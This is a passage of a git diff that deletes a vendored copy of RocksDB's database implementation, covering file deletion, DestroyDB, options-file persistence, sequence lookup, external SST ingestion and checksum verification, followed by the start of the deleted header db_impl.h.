-      sv->imm->ApproximateStats(k1.Encode(), k2.Encode());
-  *count = memStats.count + immStats.count;
-  *size = memStats.size + immStats.size;
-
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-void DBImpl::GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                 const Range* range, int n, uint64_t* sizes,
-                                 uint8_t include_flags) {
-  assert(include_flags & DB::SizeApproximationFlags::INCLUDE_FILES ||
-         include_flags & DB::SizeApproximationFlags::INCLUDE_MEMTABLES);
-  Version* v;
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* sv = GetAndRefSuperVersion(cfd);
-  v = sv->current;
-
-  for (int i = 0; i < n; i++) {
-    // Convert user_key into a corresponding internal key.
-    InternalKey k1(range[i].start, kMaxSequenceNumber, kValueTypeForSeek);
-    InternalKey k2(range[i].limit, kMaxSequenceNumber, kValueTypeForSeek);
-    sizes[i] = 0;
-    if (include_flags & DB::SizeApproximationFlags::INCLUDE_FILES) {
-      sizes[i] += versions_->ApproximateSize(v, k1.Encode(), k2.Encode());
-    }
-    if (include_flags & DB::SizeApproximationFlags::INCLUDE_MEMTABLES) {
-      sizes[i] += sv->mem->ApproximateStats(k1.Encode(), k2.Encode()).size;
-      sizes[i] += sv->imm->ApproximateStats(k1.Encode(), k2.Encode()).size;
-    }
-  }
-
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-std::list<uint64_t>::iterator
-DBImpl::CaptureCurrentFileNumberInPendingOutputs() {
-  // We need to remember the iterator of our insert, because after the
-  // background job is done, we need to remove that element from
-  // pending_outputs_.
-  pending_outputs_.push_back(versions_->current_next_file_number());
-  auto pending_outputs_inserted_elem = pending_outputs_.end();
-  --pending_outputs_inserted_elem;
-  return pending_outputs_inserted_elem;
-}
-
-void DBImpl::ReleaseFileNumberFromPendingOutputs(
-    std::list<uint64_t>::iterator v) {
-  pending_outputs_.erase(v);
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::GetUpdatesSince(
-    SequenceNumber seq, unique_ptr<TransactionLogIterator>* iter,
-    const TransactionLogIterator::ReadOptions& read_options) {
-
-  RecordTick(stats_, GET_UPDATES_SINCE_CALLS);
-  if (seq > versions_->LastSequence()) {
-    return Status::NotFound("Requested sequence not yet written in the db");
-  }
-  return wal_manager_.GetUpdatesSince(seq, iter, read_options, versions_.get());
-}
-
-Status DBImpl::DeleteFile(std::string name) {
-  uint64_t number;
-  FileType type;
-  WalFileType log_type;
-  if (!ParseFileName(name, &number, &type, &log_type) ||
-      (type != kTableFile && type != kLogFile)) {
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log, "DeleteFile %s failed.\n",
-                    name.c_str());
-    return Status::InvalidArgument("Invalid file name");
-  }
-
-  Status status;
-  if (type == kLogFile) {
-    // Only allow deleting archived log files
-    if (log_type != kArchivedLogFile) {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "DeleteFile %s failed - not archived log.\n",
-                      name.c_str());
-      return Status::NotSupported("Delete only supported for archived logs");
-    }
-    status =
-        env_->DeleteFile(immutable_db_options_.wal_dir + "/" + name.c_str());
-    if (!status.ok()) {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "DeleteFile %s failed -- %s.\n", name.c_str(),
-                      status.ToString().c_str());
-    }
-    return status;
-  }
-
-  int level;
-  FileMetaData* metadata;
-  ColumnFamilyData* cfd;
-  VersionEdit edit;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    status = versions_->GetMetadataForFile(number, &level, &metadata, &cfd);
-    if (!status.ok()) {
-      ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                     "DeleteFile %s failed. File not found\n", name.c_str());
-      job_context.Clean();
-      return Status::InvalidArgument("File not found");
-    }
-    assert(level < cfd->NumberLevels());
-
-    // If the file is being compacted no need to delete.
-    if (metadata->being_compacted) {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "DeleteFile %s Skipped. File about to be compacted\n",
-                     name.c_str());
-      job_context.Clean();
-      return Status::OK();
-    }
-
-    // Only the files in the last level can be deleted externally.
-    // This is to make sure that any deletion tombstones are not
-    // lost. Check that the level passed is the last level.
-    auto* vstoreage = cfd->current()->storage_info();
-    for (int i = level + 1; i < cfd->NumberLevels(); i++) {
-      if (vstoreage->NumLevelFiles(i) != 0) {
-        ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                       "DeleteFile %s FAILED. File not in last level\n",
-                       name.c_str());
-        job_context.Clean();
-        return Status::InvalidArgument("File not in last level");
-      }
-    }
-    // if level == 0, it has to be the oldest file
-    if (level == 0 &&
-        vstoreage->LevelFiles(0).back()->fd.GetNumber() != number) {
-      ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                     "DeleteFile %s failed ---"
-                     " target file in level 0 must be the oldest.",
-                     name.c_str());
-      job_context.Clean();
-      return Status::InvalidArgument("File in level 0, but not oldest");
-    }
-    edit.SetColumnFamily(cfd->GetID());
-    edit.DeleteFile(level, number);
-    status = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                    &edit, &mutex_, directories_.GetDbDir());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          cfd, &job_context, *cfd->GetLatestMutableCFOptions());
-    }
-    FindObsoleteFiles(&job_context, false);
-  }  // lock released here
-
-  LogFlush(immutable_db_options_.info_log);
-  // remove files outside the db-lock
-  if (job_context.HaveSomethingToDelete()) {
-    // Call PurgeObsoleteFiles() without holding mutex.
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  return status;
-}
-
-Status DBImpl::DeleteFilesInRange(ColumnFamilyHandle* column_family,
-                                  const Slice* begin, const Slice* end) {
-  Status status;
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  ColumnFamilyData* cfd = cfh->cfd();
-  VersionEdit edit;
-  std::vector<FileMetaData*> deleted_files;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    Version* input_version = cfd->current();
-
-    auto* vstorage = input_version->storage_info();
-    for (int i = 1; i < cfd->NumberLevels(); i++) {
-      if (vstorage->LevelFiles(i).empty() ||
-          !vstorage->OverlapInLevel(i, begin, end)) {
-        continue;
-      }
-      std::vector<FileMetaData*> level_files;
-      InternalKey begin_storage, end_storage, *begin_key, *end_key;
-      if (begin == nullptr) {
-        begin_key = nullptr;
-      } else {
-        begin_storage.SetMaxPossibleForUserKey(*begin);
-        begin_key = &begin_storage;
-      }
-      if (end == nullptr) {
-        end_key = nullptr;
-      } else {
-        end_storage.SetMinPossibleForUserKey(*end);
-        end_key = &end_storage;
-      }
-
-      vstorage->GetOverlappingInputs(i, begin_key, end_key, &level_files, -1,
-                                     nullptr, false);
-      FileMetaData* level_file;
-      for (uint32_t j = 0; j < level_files.size(); j++) {
-        level_file = level_files[j];
-        if (((begin == nullptr) ||
-             (cfd->internal_comparator().user_comparator()->Compare(
-                  level_file->smallest.user_key(), *begin) >= 0)) &&
-            ((end == nullptr) ||
-             (cfd->internal_comparator().user_comparator()->Compare(
-                  level_file->largest.user_key(), *end) <= 0))) {
-          if (level_file->being_compacted) {
-            continue;
-          }
-          edit.SetColumnFamily(cfd->GetID());
-          edit.DeleteFile(i, level_file->fd.GetNumber());
-          deleted_files.push_back(level_file);
-          level_file->being_compacted = true;
-        }
-      }
-    }
-    if (edit.GetDeletedFiles().empty()) {
-      job_context.Clean();
-      return Status::OK();
-    }
-    input_version->Ref();
-    status = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                    &edit, &mutex_, directories_.GetDbDir());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          cfd, &job_context, *cfd->GetLatestMutableCFOptions());
-    }
-    for (auto* deleted_file : deleted_files) {
-      deleted_file->being_compacted = false;
-    }
-    input_version->Unref();
-    FindObsoleteFiles(&job_context, false);
-  }  // lock released here
-
-  LogFlush(immutable_db_options_.info_log);
-  // remove files outside the db-lock
-  if (job_context.HaveSomethingToDelete()) {
-    // Call PurgeObsoleteFiles() without holding mutex.
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  return status;
-}
-
-void DBImpl::GetLiveFilesMetaData(std::vector<LiveFileMetaData>* metadata) {
-  InstrumentedMutexLock l(&mutex_);
-  versions_->GetLiveFilesMetaData(metadata);
-}
-
-void DBImpl::GetColumnFamilyMetaData(
-    ColumnFamilyHandle* column_family,
-    ColumnFamilyMetaData* cf_meta) {
-  assert(column_family);
-  auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  auto* sv = GetAndRefSuperVersion(cfd);
-  sv->current->GetColumnFamilyMetaData(cf_meta);
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-#endif  // ROCKSDB_LITE
-
-Status DBImpl::CheckConsistency() {
-  mutex_.AssertHeld();
-  std::vector<LiveFileMetaData> metadata;
-  versions_->GetLiveFilesMetaData(&metadata);
-
-  std::string corruption_messages;
-  for (const auto& md : metadata) {
-    // md.name has a leading "/".
-    std::string file_path = md.db_path + md.name;
-
-    uint64_t fsize = 0;
-    Status s = env_->GetFileSize(file_path, &fsize);
-    if (!s.ok() &&
-        env_->GetFileSize(Rocks2LevelTableFileName(file_path), &fsize).ok()) {
-      s = Status::OK();
-    }
-    if (!s.ok()) {
-      corruption_messages +=
-          "Can't access " + md.name + ": " + s.ToString() + "\n";
-    } else if (fsize != md.size) {
-      corruption_messages += "Sst file size mismatch: " + file_path +
-                             ". Size recorded in manifest " +
-                             ToString(md.size) + ", actual size " +
-                             ToString(fsize) + "\n";
-    }
-  }
-  if (corruption_messages.size() == 0) {
-    return Status::OK();
-  } else {
-    return Status::Corruption(corruption_messages);
-  }
-}
-
-Status DBImpl::GetDbIdentity(std::string& identity) const {
-  std::string idfilename = IdentityFileName(dbname_);
-  const EnvOptions soptions;
-  unique_ptr<SequentialFileReader> id_file_reader;
-  Status s;
-  {
-    unique_ptr<SequentialFile> idfile;
-    s = env_->NewSequentialFile(idfilename, &idfile, soptions);
-    if (!s.ok()) {
-      return s;
-    }
-    id_file_reader.reset(new SequentialFileReader(std::move(idfile)));
-  }
-
-  uint64_t file_size;
-  s = env_->GetFileSize(idfilename, &file_size);
-  if (!s.ok()) {
-    return s;
-  }
-  char* buffer = reinterpret_cast<char*>(alloca(file_size));
-  Slice id;
-  s = id_file_reader->Read(static_cast<size_t>(file_size), &id, buffer);
-  if (!s.ok()) {
-    return s;
-  }
-  identity.assign(id.ToString());
-  // If last character is '\n' remove it from identity
-  if (identity.size() > 0 && identity.back() == '\n') {
-    identity.pop_back();
-  }
-  return s;
-}
-
-// Default implementation -- returns not supported status
-Status DB::CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                              const std::string& column_family_name,
-                              ColumnFamilyHandle** handle) {
-  return Status::NotSupported("");
-}
-
-Status DB::CreateColumnFamilies(
-    const ColumnFamilyOptions& cf_options,
-    const std::vector<std::string>& column_family_names,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  return Status::NotSupported("");
-}
-
-Status DB::CreateColumnFamilies(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  return Status::NotSupported("");
-}
-
-Status DB::DropColumnFamily(ColumnFamilyHandle* column_family) {
-  return Status::NotSupported("");
-}
-
-Status DB::DropColumnFamilies(
-    const std::vector<ColumnFamilyHandle*>& column_families) {
-  return Status::NotSupported("");
-}
-
-Status DB::DestroyColumnFamilyHandle(ColumnFamilyHandle* column_family) {
-  delete column_family;
-  return Status::OK();
-}
-
-DB::~DB() { }
-
-Status DB::ListColumnFamilies(const DBOptions& db_options,
-                              const std::string& name,
-                              std::vector<std::string>* column_families) {
-  return VersionSet::ListColumnFamilies(column_families, name, db_options.env);
-}
-
-Snapshot::~Snapshot() {
-}
-
-Status DestroyDB(const std::string& dbname, const Options& options) {
-  const ImmutableDBOptions soptions(SanitizeOptions(dbname, options));
-  Env* env = soptions.env;
-  std::vector<std::string> filenames;
-
-  // Ignore error in case directory does not exist
-  env->GetChildren(dbname, &filenames);
-
-  FileLock* lock;
-  const std::string lockname = LockFileName(dbname);
-  Status result = env->LockFile(lockname, &lock);
-  if (result.ok()) {
-    uint64_t number;
-    FileType type;
-    InfoLogPrefix info_log_prefix(!soptions.db_log_dir.empty(), dbname);
-    for (size_t i = 0; i < filenames.size(); i++) {
-      if (ParseFileName(filenames[i], &number, info_log_prefix.prefix, &type) &&
-          type != kDBLockFile) {  // Lock file will be deleted at end
-        Status del;
-        std::string path_to_delete = dbname + "/" + filenames[i];
-        if (type == kMetaDatabase) {
-          del = DestroyDB(path_to_delete, options);
-        } else if (type == kTableFile) {
-          del = DeleteSSTFile(&soptions, path_to_delete, 0);
-        } else {
-          del = env->DeleteFile(path_to_delete);
-        }
-        if (result.ok() && !del.ok()) {
-          result = del;
-        }
-      }
-    }
-
-    for (size_t path_id = 0; path_id < options.db_paths.size(); path_id++) {
-      const auto& db_path = options.db_paths[path_id];
-      env->GetChildren(db_path.path, &filenames);
-      for (size_t i = 0; i < filenames.size(); i++) {
-        if (ParseFileName(filenames[i], &number, &type) &&
-            type == kTableFile) {  // Lock file will be deleted at end
-          std::string table_path = db_path.path + "/" + filenames[i];
-          Status del = DeleteSSTFile(&soptions, table_path,
-                                     static_cast<uint32_t>(path_id));
-          if (result.ok() && !del.ok()) {
-            result = del;
-          }
-        }
-      }
-    }
-
-    std::vector<std::string> walDirFiles;
-    std::string archivedir = ArchivalDirectory(dbname);
-    if (dbname != soptions.wal_dir) {
-      env->GetChildren(soptions.wal_dir, &walDirFiles);
-      archivedir = ArchivalDirectory(soptions.wal_dir);
-    }
-
-    // Delete log files in the WAL dir
-    for (const auto& file : walDirFiles) {
-      if (ParseFileName(file, &number, &type) && type == kLogFile) {
-        Status del = env->DeleteFile(LogFileName(soptions.wal_dir, number));
-        if (result.ok() && !del.ok()) {
-          result = del;
-        }
-      }
-    }
-
-    std::vector<std::string> archiveFiles;
-    env->GetChildren(archivedir, &archiveFiles);
-    // Delete archival files.
-    for (size_t i = 0; i < archiveFiles.size(); ++i) {
-      if (ParseFileName(archiveFiles[i], &number, &type) &&
-          type == kLogFile) {
-        Status del = env->DeleteFile(archivedir + "/" + archiveFiles[i]);
-        if (result.ok() && !del.ok()) {
-          result = del;
-        }
-      }
-    }
-
-    // ignore case where no archival directory is present
-    env->DeleteDir(archivedir);
-
-    env->UnlockFile(lock);  // Ignore error since state is already gone
-    env->DeleteFile(lockname);
-    env->DeleteDir(dbname);  // Ignore error in case dir contains other files
-    env->DeleteDir(soptions.wal_dir);
-  }
-  return result;
-}
-
-Status DBImpl::WriteOptionsFile(bool need_mutex_lock,
-                                bool need_enter_write_thread) {
-#ifndef ROCKSDB_LITE
-  WriteThread::Writer w;
-  if (need_mutex_lock) {
-    mutex_.Lock();
-  } else {
-    mutex_.AssertHeld();
-  }
-  if (need_enter_write_thread) {
-    write_thread_.EnterUnbatched(&w, &mutex_);
-  }
-
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyOptions> cf_opts;
-
-  // This part requires mutex to protect the column family options
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    cf_names.push_back(cfd->GetName());
-    cf_opts.push_back(cfd->GetLatestCFOptions());
-  }
-
-  // Unlock during expensive operations.  New writes cannot get here
-  // because the single write thread ensures all new writes get queued.
-  DBOptions db_options =
-      BuildDBOptions(immutable_db_options_, mutable_db_options_);
-  mutex_.Unlock();
-
-  TEST_SYNC_POINT("DBImpl::WriteOptionsFile:1");
-  TEST_SYNC_POINT("DBImpl::WriteOptionsFile:2");
-
-  std::string file_name =
-      TempOptionsFileName(GetName(), versions_->NewFileNumber());
-  Status s =
-      PersistRocksDBOptions(db_options, cf_names, cf_opts, file_name, GetEnv());
-
-  if (s.ok()) {
-    s = RenameTempFileToOptionsFile(file_name);
-  }
-  // restore lock
-  if (!need_mutex_lock) {
-    mutex_.Lock();
-  }
-  if (need_enter_write_thread) {
-    write_thread_.ExitUnbatched(&w);
-  }
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "Unnable to persist options -- %s", s.ToString().c_str());
-    if (immutable_db_options_.fail_if_options_file_error) {
-      return Status::IOError("Unable to persist options.",
-                             s.ToString().c_str());
-    }
-  }
-#endif  // !ROCKSDB_LITE
-  return Status::OK();
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-void DeleteOptionsFilesHelper(const std::map<uint64_t, std::string>& filenames,
-                              const size_t num_files_to_keep,
-                              const std::shared_ptr<Logger>& info_log,
-                              Env* env) {
-  if (filenames.size() <= num_files_to_keep) {
-    return;
-  }
-  for (auto iter = std::next(filenames.begin(), num_files_to_keep);
-       iter != filenames.end(); ++iter) {
-    if (!env->DeleteFile(iter->second).ok()) {
-      ROCKS_LOG_WARN(info_log, "Unable to delete options file %s",
-                     iter->second.c_str());
-    }
-  }
-}
-}  // namespace
-#endif  // !ROCKSDB_LITE
-
-Status DBImpl::DeleteObsoleteOptionsFiles() {
-#ifndef ROCKSDB_LITE
-  std::vector<std::string> filenames;
-  // use ordered map to store keep the filenames sorted from the newest
-  // to the oldest.
-  std::map<uint64_t, std::string> options_filenames;
-  Status s;
-  s = GetEnv()->GetChildren(GetName(), &filenames);
-  if (!s.ok()) {
-    return s;
-  }
-  for (auto& filename : filenames) {
-    uint64_t file_number;
-    FileType type;
-    if (ParseFileName(filename, &file_number, &type) && type == kOptionsFile) {
-      options_filenames.insert(
-          {std::numeric_limits<uint64_t>::max() - file_number,
-           GetName() + "/" + filename});
-    }
-  }
-
-  // Keeps the latest 2 Options file
-  const size_t kNumOptionsFilesKept = 2;
-  DeleteOptionsFilesHelper(options_filenames, kNumOptionsFilesKept,
-                           immutable_db_options_.info_log, GetEnv());
-  return Status::OK();
-#else
-  return Status::OK();
-#endif  // !ROCKSDB_LITE
-}
-
-Status DBImpl::RenameTempFileToOptionsFile(const std::string& file_name) {
-#ifndef ROCKSDB_LITE
-  Status s;
-
-  versions_->options_file_number_ = versions_->NewFileNumber();
-  std::string options_file_name =
-      OptionsFileName(GetName(), versions_->options_file_number_);
-  // Retry if the file name happen to conflict with an existing one.
-  s = GetEnv()->RenameFile(file_name, options_file_name);
-
-  DeleteObsoleteOptionsFiles();
-  return s;
-#else
-  return Status::OK();
-#endif  // !ROCKSDB_LITE
-}
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-void DBImpl::NewThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-  if (immutable_db_options_.enable_thread_tracking) {
-    ThreadStatusUtil::NewColumnFamilyInfo(this, cfd, cfd->GetName(),
-                                          cfd->ioptions()->env);
-  }
-}
-
-void DBImpl::EraseThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-  if (immutable_db_options_.enable_thread_tracking) {
-    ThreadStatusUtil::EraseColumnFamilyInfo(cfd);
-  }
-}
-
-void DBImpl::EraseThreadStatusDbInfo() const {
-  if (immutable_db_options_.enable_thread_tracking) {
-    ThreadStatusUtil::EraseDatabaseInfo(this);
-  }
-}
-
-#else
-void DBImpl::NewThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-}
-
-void DBImpl::EraseThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-}
-
-void DBImpl::EraseThreadStatusDbInfo() const {
-}
-#endif  // ROCKSDB_USING_THREAD_STATUS
-
-//
-// A global method that can dump out the build version
-void DumpRocksDBBuildVersion(Logger * log) {
-#if !defined(IOS_CROSS_COMPILE)
-  // if we compile with Xcode, we don't run build_detect_version, so we don't
-  // generate util/build_version.cc
-  ROCKS_LOG_HEADER(log, "RocksDB version: %d.%d.%d\n", ROCKSDB_MAJOR,
-                   ROCKSDB_MINOR, ROCKSDB_PATCH);
-  ROCKS_LOG_HEADER(log, "Git sha %s", rocksdb_build_git_sha);
-  ROCKS_LOG_HEADER(log, "Compile date %s", rocksdb_build_compile_date);
-#endif
-}
-
-#ifndef ROCKSDB_LITE
-SequenceNumber DBImpl::GetEarliestMemTableSequenceNumber(SuperVersion* sv,
-                                                         bool include_history) {
-  // Find the earliest sequence number that we know we can rely on reading
-  // from the memtable without needing to check sst files.
-  SequenceNumber earliest_seq =
-      sv->imm->GetEarliestSequenceNumber(include_history);
-  if (earliest_seq == kMaxSequenceNumber) {
-    earliest_seq = sv->mem->GetEarliestSequenceNumber();
-  }
-  assert(sv->mem->GetEarliestSequenceNumber() >= earliest_seq);
-
-  return earliest_seq;
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key,
-                                       bool cache_only, SequenceNumber* seq,
-                                       bool* found_record_for_key,
-                                       bool* is_blob_index) {
-  Status s;
-  MergeContext merge_context;
-  RangeDelAggregator range_del_agg(sv->mem->GetInternalKeyComparator(),
-                                   kMaxSequenceNumber);
-
-  ReadOptions read_options;
-  SequenceNumber current_seq = versions_->LastSequence();
-  LookupKey lkey(key, current_seq);
-
-  *seq = kMaxSequenceNumber;
-  *found_record_for_key = false;
-
-  // Check if there is a record for this key in the latest memtable
-  sv->mem->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq,
-               read_options, is_blob_index);
-
-  if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-    // unexpected error reading memtable.
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "Unexpected status returned from MemTable::Get: %s\n",
-                    s.ToString().c_str());
-
-    return s;
-  }
-
-  if (*seq != kMaxSequenceNumber) {
-    // Found a sequence number, no need to check immutable memtables
-    *found_record_for_key = true;
-    return Status::OK();
-  }
-
-  // Check if there is a record for this key in the immutable memtables
-  sv->imm->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq,
-               read_options, is_blob_index);
-
-  if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-    // unexpected error reading memtable.
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "Unexpected status returned from MemTableList::Get: %s\n",
-                    s.ToString().c_str());
-
-    return s;
-  }
-
-  if (*seq != kMaxSequenceNumber) {
-    // Found a sequence number, no need to check memtable history
-    *found_record_for_key = true;
-    return Status::OK();
-  }
-
-  // Check if there is a record for this key in the immutable memtables
-  sv->imm->GetFromHistory(lkey, nullptr, &s, &merge_context, &range_del_agg,
-                          seq, read_options, is_blob_index);
-
-  if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-    // unexpected error reading memtable.
-    ROCKS_LOG_ERROR(
-        immutable_db_options_.info_log,
-        "Unexpected status returned from MemTableList::GetFromHistory: %s\n",
-        s.ToString().c_str());
-
-    return s;
-  }
-
-  if (*seq != kMaxSequenceNumber) {
-    // Found a sequence number, no need to check SST files
-    *found_record_for_key = true;
-    return Status::OK();
-  }
-
-  // TODO(agiardullo): possible optimization: consider checking cached
-  // SST files if cache_only=true?
-  if (!cache_only) {
-    // Check tables
-    sv->current->Get(read_options, lkey, nullptr, &s, &merge_context,
-                     &range_del_agg, nullptr /* value_found */,
-                     found_record_for_key, seq, is_blob_index);
-
-    if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-      // unexpected error reading SST files
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Unexpected status returned from Version::Get: %s\n",
-                      s.ToString().c_str());
-
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status DBImpl::IngestExternalFile(
-    ColumnFamilyHandle* column_family,
-    const std::vector<std::string>& external_files,
-    const IngestExternalFileOptions& ingestion_options) {
-  Status status;
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Ingest should immediately fail if ingest_behind is requested,
-  // but the DB doesn't support it.
-  if (ingestion_options.ingest_behind) {
-    if (!immutable_db_options_.allow_ingest_behind) {
-      return Status::InvalidArgument(
-        "Can't ingest_behind file in DB with allow_ingest_behind=false");
-    }
-  }
-
-  ExternalSstFileIngestionJob ingestion_job(env_, versions_.get(), cfd,
-                                            immutable_db_options_, env_options_,
-                                            &snapshots_, ingestion_options);
-
-  std::list<uint64_t>::iterator pending_output_elem;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    if (!bg_error_.ok()) {
-      // Don't ingest files when there is a bg_error
-      return bg_error_;
-    }
-
-    // Make sure that bg cleanup wont delete the files that we are ingesting
-    pending_output_elem = CaptureCurrentFileNumberInPendingOutputs();
-  }
-
-  status = ingestion_job.Prepare(external_files);
-  if (!status.ok()) {
-    return status;
-  }
-
-  TEST_SYNC_POINT("DBImpl::AddFile:Start");
-  {
-    // Lock db mutex
-    InstrumentedMutexLock l(&mutex_);
-    TEST_SYNC_POINT("DBImpl::AddFile:MutexLock");
-
-    // Stop writes to the DB by entering both write threads
-    WriteThread::Writer w;
-    write_thread_.EnterUnbatched(&w, &mutex_);
-    WriteThread::Writer nonmem_w;
-    if (concurrent_prepare_) {
-      nonmem_write_thread_.EnterUnbatched(&nonmem_w, &mutex_);
-    }
-
-    num_running_ingest_file_++;
-
-    // We cannot ingest a file into a dropped CF
-    if (cfd->IsDropped()) {
-      status = Status::InvalidArgument(
-          "Cannot ingest an external file into a dropped CF");
-    }
-
-    // Figure out if we need to flush the memtable first
-    if (status.ok()) {
-      bool need_flush = false;
-      status = ingestion_job.NeedsFlush(&need_flush);
-      TEST_SYNC_POINT_CALLBACK("DBImpl::IngestExternalFile:NeedFlush",
-                               &need_flush);
-      if (status.ok() && need_flush) {
-        mutex_.Unlock();
-        status = FlushMemTable(cfd, FlushOptions(), true /* writes_stopped */);
-        mutex_.Lock();
-      }
-    }
-
-    // Run the ingestion job
-    if (status.ok()) {
-      status = ingestion_job.Run();
-    }
-
-    // Install job edit [Mutex will be unlocked here]
-    auto mutable_cf_options = cfd->GetLatestMutableCFOptions();
-    if (status.ok()) {
-      status =
-          versions_->LogAndApply(cfd, *mutable_cf_options, ingestion_job.edit(),
-                                 &mutex_, directories_.GetDbDir());
-    }
-    if (status.ok()) {
-      delete InstallSuperVersionAndScheduleWork(cfd, nullptr,
-                                                *mutable_cf_options);
-    }
-
-    // Resume writes to the DB
-    if (concurrent_prepare_) {
-      nonmem_write_thread_.ExitUnbatched(&nonmem_w);
-    }
-    write_thread_.ExitUnbatched(&w);
-
-    // Update stats
-    if (status.ok()) {
-      ingestion_job.UpdateStats();
-    }
-
-    ReleaseFileNumberFromPendingOutputs(pending_output_elem);
-
-    num_running_ingest_file_--;
-    if (num_running_ingest_file_ == 0) {
-      bg_cv_.SignalAll();
-    }
-
-    TEST_SYNC_POINT("DBImpl::AddFile:MutexUnlock");
-  }
-  // mutex_ is unlocked here
-
-  // Cleanup
-  ingestion_job.Cleanup(status);
-
-  if (status.ok()) {
-    NotifyOnExternalFileIngested(cfd, ingestion_job);
-  }
-
-  return status;
-}
-
-Status DBImpl::VerifyChecksum() {
-  Status s;
-  Options options;
-  EnvOptions env_options;
-  std::vector<ColumnFamilyData*> cfd_list;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      if (!cfd->IsDropped() && cfd->initialized()) {
-        cfd->Ref();
-        cfd_list.push_back(cfd);
-      }
-    }
-  }
-  std::vector<SuperVersion*> sv_list;
-  for (auto cfd : cfd_list) {
-    sv_list.push_back(cfd->GetReferencedSuperVersion(&mutex_));
-  }
-  for (auto& sv : sv_list) {
-    VersionStorageInfo* vstorage = sv->current->storage_info();
-    for (int i = 0; i < vstorage->num_non_empty_levels() && s.ok(); i++) {
-      for (size_t j = 0; j < vstorage->LevelFilesBrief(i).num_files && s.ok();
-           j++) {
-        const auto& fd = vstorage->LevelFilesBrief(i).files[j].fd;
-        std::string fname = TableFileName(immutable_db_options_.db_paths,
-                                          fd.GetNumber(), fd.GetPathId());
-        s = rocksdb::VerifySstFileChecksum(options, env_options, fname);
-      }
-    }
-    if (!s.ok()) {
-      break;
-    }
-  }
-  {
-    InstrumentedMutexLock l(&mutex_);
-    for (auto sv : sv_list) {
-      if (sv && sv->Unref()) {
-        sv->Cleanup();
-        delete sv;
-      }
-    }
-    for (auto cfd : cfd_list) {
-        cfd->Unref();
-    }
-  }
-  return s;
-}
-
-void DBImpl::NotifyOnExternalFileIngested(
-    ColumnFamilyData* cfd, const ExternalSstFileIngestionJob& ingestion_job) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.empty()) {
-    return;
-  }
-
-  for (const IngestedFileInfo& f : ingestion_job.files_to_ingest()) {
-    ExternalFileIngestionInfo info;
-    info.cf_name = cfd->GetName();
-    info.external_file_path = f.external_file_path;
-    info.internal_file_path = f.internal_file_path;
-    info.global_seqno = f.assigned_seqno;
-    info.table_properties = f.table_properties;
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnExternalFileIngested(this, info);
-    }
-  }
-
-#endif
-}
-
-void DBImpl::WaitForIngestFile() {
-  mutex_.AssertHeld();
-  while (num_running_ingest_file_ > 0) {
-    bg_cv_.Wait();
-  }
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl.h b/thirdparty/rocksdb/db/db_impl.h
deleted file mode 100644
index f1730f9..0000000
--- a/thirdparty/rocksdb/db/db_impl.h
+++ /dev/null
@@ -1,1301 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
